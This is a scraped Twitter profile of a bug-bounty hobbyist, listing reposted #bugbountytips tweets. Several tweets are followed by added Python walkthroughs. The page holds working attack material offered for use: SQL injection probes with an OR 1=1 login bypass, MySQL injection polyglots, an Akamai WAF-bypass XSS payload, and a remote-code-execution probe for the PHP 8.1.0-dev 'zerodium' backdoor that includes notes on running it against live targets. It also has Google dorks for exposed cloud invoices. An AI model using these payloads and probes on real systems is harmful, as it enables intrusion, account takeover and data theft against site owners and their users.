diablo_237 (@akash__rg): Twitter profile
diablo_237

@akash__rg

Cyber security enthusiast | aspiring bug hunter |

ID: 1294118429742567425

Link: https://tryhackme.com/p/diablo237
Joined: 14-08-2020 03:48:13

1.1K Tweets

57 Followers

307 Following

Kullai⚡️ (@kullai12)


Found SQL Injection to Account Takeover Manually :) 
1. Enter mobile number to login intercept
{"mobile_number":"8888888888"} >> 200
{"mobile_number":"8888888888'"} >> 500
{"mobile_number":"8888888888''"} >> 200

#bugbountytips
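An added worked example, not part of Kullai's tweet: a Python simulation of the three-request quote check against a constructed SQLite-backed login handler that concatenates the JSON field into its query, beside a parameterised version of the same handler. The user table, the 200/500 mapping, the sample numbers and the tautology follow-up are all constructed here for illustration, not taken from the target in the tweet.

```python
import sqlite3

# Constructed sample data standing in for the target's user table.
USERS = [("8888888888", "alice"), ("7777777777", "bob")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, mobile_number TEXT, name TEXT)"
    )
    conn.executemany("INSERT INTO users (mobile_number, name) VALUES (?, ?)", USERS)
    conn.commit()
    return conn


def vulnerable_login(conn, mobile_number):
    """Constructed vulnerable handler: the JSON field is concatenated into SQL.
    Returns (http_status, row) the way the tweet's target behaved: a query
    error becomes a 500, anything that parses becomes a 200."""
    sql = f"SELECT id, name FROM users WHERE mobile_number = '{mobile_number}'"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return 500, None
    return 200, row


def safe_login(conn, mobile_number):
    """Hardened handler: bound parameter, so quotes are data, never syntax."""
    sql = "SELECT id, name FROM users WHERE mobile_number = ?"
    return 200, conn.execute(sql, (mobile_number,)).fetchone()


def quote_probe(send, value="8888888888"):
    """The three-request check from the tweet: value, value+' and value+''.
    `send` takes the mobile_number string and returns (status, row).
    [200, 500, 200] means one quote broke the query and two quotes (an
    escaped quote) repaired it: the signature of input reaching the SQL parser."""
    statuses = [send(value)[0], send(value + "'")[0], send(value + "''")[0]]
    return statuses, statuses == [200, 500, 200]


def run_demo():
    conn = make_db()
    vuln = lambda m: vulnerable_login(conn, m)
    safe = lambda m: safe_login(conn, m)
    # Classic follow-up (constructed, not from the tweet): a tautology returns
    # the first user, which is why this class of bug ends in logging in as
    # someone else.
    bypass = "x' OR 1=1 --"
    return {
        "vulnerable_statuses": quote_probe(vuln)[0],
        "vulnerable_flagged": quote_probe(vuln)[1],
        "safe_statuses": quote_probe(safe)[0],
        "safe_flagged": quote_probe(safe)[1],
        "vulnerable_bypass_user": (vuln(bypass)[1] or (None, None))[1],
        "safe_bypass_user": (safe(bypass)[1] or (None, None))[1],
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Against a live target, `send` would wrap the real login request (for example `requests.post(url, json={"mobile_number": m})`) and return its status code; the classifier logic stays the same. Note that a 500 on a single quote is only a strong hint: confirm with a boolean or time-based difference before reporting.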
Aditya Shende (@adityashende17)


Dorking Clouds 🌩️

Have you thought of targeting Google Dorking techniques for cloud storage, CDNs, and more. Check out these 👇

Find Invoices
site:*.s3.amazonaws.com -www Uber Invoice 

Breakdown:
-Targets Amazon S3 buckets with Uber-related invoice files.
-Excludes common
daniel (@hackermondev)

1 Bug, $50K+ in bounties: how Zendesk left a backdoor in hundreds of companies #bugbountytips gist.github.com/hackermondev/6…

Erick Fernando (@erickfernandox)


If the WAF doesn't allow the creation of a JavaScript term like 'alert' or 'confirm' in any way, write it inverted and then use reverse() with self[].

Payload:

<a%20href=%0dj&Tab;avascript&colon;x='trela'.split('').reverse().join('');self[x](origin)>

#Bugbounty #AkamaiBypass
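Added example, not from the tweet (which only gives the payload): Python that walks the payload through the decoding layers a browser applies, showing why a keyword rule for `alert`/`confirm` never fires on the raw input while the href still resolves to a `javascript:` URL that ends up calling `alert`. The blocklist regex and the two parsing helpers are constructed approximations of the HTML tokenizer and the URL parser, not a real WAF or browser engine.

```python
import html
import re
from urllib.parse import unquote

# The payload from the tweet, as it would sit in a query-string parameter.
PAYLOAD = ("<a%20href=%0dj&Tab;avascript&colon;"
           "x='trela'.split('').reverse().join('');self[x](origin)>")

# Constructed stand-in for a keyword-blocking WAF rule.
BLOCKED = re.compile(r"alert|confirm|prompt", re.I)


def naive_waf_blocks(raw):
    """What a blocklist sees: the raw parameter, before any decoding."""
    return bool(BLOCKED.search(raw))


def reflected_html(raw):
    """What the page contains after the server percent-decodes the parameter."""
    return unquote(raw)


def attribute_value(markup, name="href"):
    """HTML tokenizer view of an unquoted attribute: whitespace after '=' is
    skipped (so the %0d carriage return is harmless), the value runs to the
    next raw whitespace or '>', and character references such as &Tab; and
    &colon; are decoded inside the value without terminating it."""
    m = re.search(name + r"=[\t\n\f\r ]*([^\t\n\f\r >]*)", markup)
    return html.unescape(m.group(1)) if m else None


def url_scheme(value):
    """URL parser view: strip leading/trailing C0 controls and space, drop
    every tab/LF/CR anywhere in the input, then read the scheme up to ':'."""
    v = value.strip("".join(chr(c) for c in range(0x21)))
    v = re.sub(r"[\t\n\r]", "", v)
    m = re.match(r"([A-Za-z][A-Za-z0-9+.\-]*):", v)
    return m.group(1).lower() if m else None


def reversed_literal_target(js):
    """Recover the function name hidden by 'xxx'.split('').reverse().join('')."""
    m = re.search(r"'([^']*)'\.split\(''\)\.reverse\(\)\.join\(''\)", js)
    return m.group(1)[::-1] if m else None


def analyze(raw=PAYLOAD):
    href = attribute_value(reflected_html(raw))
    return {
        "naive_waf_blocked": naive_waf_blocks(raw),
        "scheme": url_scheme(href),
        "called": reversed_literal_target(href),
    }


if __name__ == "__main__":
    print(analyze())
```

The durable server-side check is on the decoded attribute's scheme (`url_scheme(...) == "javascript"`) or, better, on output encoding and a CSP, not on spotting the word `alert`: the function name can be assembled at runtime in more ways than any blocklist can enumerate.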
Godfather Orwa 🇯🇴 (@godfatherorwa)

Slides of my talk in Security BSides Ahmedabad I hope you like it and found it a little bit useful docs.google.com/presentation/d… #bugbounty #bugbountytip #bugbountytips #infosec Thanks for support for all of you and Security BSides Ahmedabad & bugcrowd

Arshiya (@arshiyaiha)

Common vulnerabilities in Wordpress sites with severity for report #bugbounty. 1.Configuration File Leakage 2.Admin Username enumeration via REST API 3.Enable Xmlrpc.php 4.Vulnerable upload plugin #bugbountytip #hack #wordpress medium.com/@sriharanmahim…

Md Ismail Šojal 🕷️ (@0x0sojalsec)


If you find PHP 8.1.0-dev then try RCE & SQLi
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');

#bugbounty #bugbountytips #rce #sqli
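Added example, not from the tweet: a Python probe for the header shown above, with the time-based (`sleep(5);`) and output-based (`system('id');`) checks, run against two constructed stand-in targets so it executes offline. The header name `User-Agentt` and the `zerodium` prefix come from the tweet; the stand-in responses, the simulated timings and the `uid=33(www-data)` output are constructed for illustration.

```python
import re

HEADER = "User-Agentt"   # the doubled-t header name from the tweet
PREFIX = "zerodium"      # the prefix the backdoored build looks for


def backdoor_headers(php_code):
    """Headers for one probe, in the tweet's 'User-Agentt: zerodium<php>' form."""
    return {HEADER: PREFIX + php_code}


def time_based_check(send, delay=5, tolerance=1.0):
    """Blind confirmation: sleep(N) in the header should add about N seconds
    over a baseline request. `send(headers)` returns (status, body, seconds)."""
    baseline = send({})[2]
    delayed = send(backdoor_headers(f"sleep({delay});"))[2]
    return (delayed - baseline) >= (delay - tolerance)


def command_check(send):
    """Output-based confirmation: system('id') output reflected in the body."""
    _, body, _ = send(backdoor_headers("system('id');"))
    m = re.search(r"uid=\d+\([^)]+\)", body)
    return m.group(0) if m else None


def probe(send):
    return {"time_based": time_based_check(send), "id_output": command_check(send)}


# --- constructed stand-ins so the probe runs offline -------------------------

def fake_backdoored_target(headers):
    """Mimics a backdoored build: honours only sleep(N) and system('id'), and
    reports a simulated elapsed time instead of really sleeping."""
    value = headers.get(HEADER, "")
    if not value.startswith(PREFIX):
        return 200, "<html>ok</html>", 0.2
    code = value[len(PREFIX):]
    m = re.fullmatch(r"sleep\((\d+)\);", code)
    if m:
        return 200, "<html>ok</html>", 0.2 + int(m.group(1))
    if code == "system('id');":
        return 200, "uid=33(www-data) gid=33(www-data)\n<html>ok</html>", 0.2
    return 200, "<html>ok</html>", 0.2


def fake_clean_target(headers):
    """A build that ignores the header entirely."""
    return 200, "<html>ok</html>", 0.2


if __name__ == "__main__":
    print("backdoored:", probe(fake_backdoored_target))
    print("clean:     ", probe(fake_clean_target))
```

For a live, in-scope target, `send` would wrap `requests.get(url, headers=headers, timeout=15)` and return `(r.status_code, r.text, r.elapsed.total_seconds())`; repeat the timing check a few times so network jitter does not produce a false positive, and prefer `sleep` over `system` when you only need proof.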
Emad Shanab - أبو عبد الله (@alra3ees)

getSubsidiaries:- Get list of subsidiaries for a selected company. This is useful for recon of wide scope bug bounty targets. github.com/xnl-h4ck3r/get…

Intigriti (@intigriti)

JS0N Haddix Lupin PortSwigger That was it! We hope you've learned something new (and enjoyed) this thread! If you have enjoyed this thread: 1. Follow us Intigriti for more of these threads! 🐛 2. Retweet the first Tweet to share it with your friends 💙

SULTAN 🇸🇦 (@sf7dev)


🛑 How I turned a "Simple Search" feature into a Blind IDOR that exposed sensitive information for over 20k users in just 2 minutes! 🛑

Have you heard of a vulnerability called Blind IDOR? Sounds strange, right?

Today, I’m going to talk about a vulnerability I discovered in one
Jason Haddix (@jhaddix)


Day TWO of FIVE days of celebrating our 2 year ARCANUM-VERSARY! Arcanum Information Security

3rd Giveaway = FOUR seats to our new course by the_IDORminator "Zero to [BAC] Hero" !

👍 1 Like = 1 Entry!
♻️ 1 Share =  2 Entries!

Winners announced 1/21!  Syllabus link below 👇
Mohamed Reda Desoky (@mrdesoky0)

Great work Godfather Orwa 🇯🇴 This is a solid bypass. I recently wrote a write-up on a similar Stored XSS via PDF I found in Sep 2025: medium.com/@mrdesoky0/sto… Keep it up 🔥

André Baptista (@0xacb)

404 page to RCE. A report by spaceraccoon | Eugene Lim He chained two old CVEs to achieve RCE: - Found a 404 page mentioning an obscure CMS, discovered /josso/signin login - Triggered CVE-2007-0450 (directory traversal in mod_proxy) using a %5C../ to bypass the internal proxy - Reached

Harley (@infinitelogins)

A misconfigured “Login with Google” gave any Google user access to the admin console of an AI children’s toy, exposing every child’s conversations, family data, and remote device controls. Read more about this in Joseph Thacker's latest blog. Full write-up 👇 josephthacker.com/hacking/2026/0…

Brute Logic (@brutelogic)

#SQL Injection Polyglots (Tested on MySQL & MariaDB)

&1/*'/*"/**/||1#\
and-1/*'/*"/**/||1--+\

It performs injection on single and double quotes scenarios plus quoteless ones (where the injection lands in 2 consecutive points of the query). Use it in ALL input fields at once.
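Added example, not from Brute Logic's tweet: a Python renderer that appends each polyglot to a legitimate value in three constructed query templates (quoteless, single-quoted, double-quoted) and strips MySQL comments while honouring string literals, so you can see which fragment each context swallows and that the `||1` tail survives outside the literal in all three. The templates and the `admin`/`1` values are constructed; the comment stripper follows MySQL's `/* */`, `#` and `-- ` rules but does not evaluate the remaining expression, so it shows parsing, not query results.

```python
from urllib.parse import unquote_plus

# The two polyglots from the tweet, exactly as posted.
POLYGLOTS = [
    "&1/*'/*\"/**/||1#\\",
    "and-1/*'/*\"/**/||1--+\\",
]

# Constructed query templates for the three landing contexts; the payload is
# appended to a legitimate value, as it would be in a real parameter.
CONTEXTS = {
    "quoteless": "SELECT * FROM users WHERE id=1{}",
    "single":    "SELECT * FROM users WHERE name='admin{}'",
    "double":    'SELECT * FROM users WHERE name="admin{}"',
}


def strip_mysql_comments(sql):
    """Remove MySQL comments (/* */, # to end of line, '-- ' to end of line)
    while honouring string literals and backslash escapes, so the output is
    what the SQL parser actually sees."""
    out, i, n, quote = [], 0, len(sql), None
    while i < n:
        c = sql[i]
        if quote:                                   # inside a string literal
            out.append(c)
            if c == "\\" and i + 1 < n:             # escaped char: keep both
                out.append(sql[i + 1])
                i += 2
                continue
            if c == quote:
                quote = None
            i += 1
            continue
        if c in ("'", '"'):                         # literal opens
            quote = c
            out.append(c)
            i += 1
            continue
        if sql.startswith("/*", i):                 # block comment
            end = sql.find("*/", i + 2)
            i = n if end < 0 else end + 2
            out.append(" ")
            continue
        if c == "#" or sql.startswith("-- ", i):    # line comment
            end = sql.find("\n", i)
            i = n if end < 0 else end
            continue
        out.append(c)
        i += 1
    return "".join(out)


def render(polyglot):
    """Effective SQL per context after URL decoding ('+' becomes a space,
    which is what makes '--+' a valid MySQL line comment) and comment stripping."""
    decoded = unquote_plus(polyglot)
    return {ctx: strip_mysql_comments(tpl.format(decoded)).rstrip()
            for ctx, tpl in CONTEXTS.items()}


def tail_is_or_true(effective):
    """True when the query ends in the OR-true tail outside any literal."""
    return effective.endswith("||1")


if __name__ == "__main__":
    for p in POLYGLOTS:
        print("payload:", p)
        for ctx, sql in render(p).items():
            print(f"  {ctx:9s} -> {sql}")
```

Reading the output for the first polyglot: the quoteless context keeps `&1`, the single-quote context closes its literal on the `'` inside `/*'`, and the double-quote context closes on the `"` inside `/*"`; in every case the rest of the comment soup disappears and `||1` is left as a bare expression while `#` eats the template's closing quote.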

Clement 'Tino (@tinopreter)


$4,500 in March isn’t much. Good thing is, April gives us another chance to go harder. 

Take some time and read about how a simple $500 Email verification bypass was escalated into a $1,500 because I kept expanding the impact through other reports. 
🔗 medium.com/@tinopreter/fr…